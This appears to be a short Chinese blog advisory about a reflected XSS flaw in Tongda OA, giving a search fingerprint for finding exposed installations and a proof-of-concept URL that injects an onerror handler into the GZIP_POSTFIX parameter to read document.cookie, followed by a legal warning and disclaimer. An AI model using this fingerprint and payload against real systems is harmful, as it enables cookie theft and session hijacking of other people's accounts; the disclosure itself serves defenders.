关于通达OA存在反射XSS漏洞的预警

发布于 作者:

关于通达OA存在反射XSS漏洞的预警

原创 丁永博 丁永博的成长日记 2024-02-27 23:59

通达OA是中国协同办公自动化软件(OA软件)普及型的旗舰产品。该系统存在xss跨站脚本漏洞,可能造成cookie泄漏,黑客可利用获得的cookie登录系统。

指纹: 

app="TDXK-通达OA"

poc: 

http://ip/module/html_editor/editor/plugins/td_listview/td_listview.php?GZIP_POSTFIX=%22+onerror=alert(document.cookie)+a=1

关于通达OA存在反射XSS漏洞的预警 -1

关于通达OA存在反射XSS漏洞的预警 -2

小知识

依据《刑法》第285条第3款的规定,犯提供非法侵入或者控制计算机信息系罪的,处3年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处3年以上7年以下有期徒刑,并处罚金。

关于通达OA存在反射XSS漏洞的预警 -2

声明

本文提供的技术参数仅供学习或运维人员对内部系统进行测试提供参考,未经授权请勿用本文提供的技术进行破坏性测试,利用此文提供的信息造成的直接或间接损失,由使用者承担。

关于通达OA存在反射XSS漏洞的预警 -3

欢迎 
在看

留言

分享至朋友圈
 三连

好文推荐****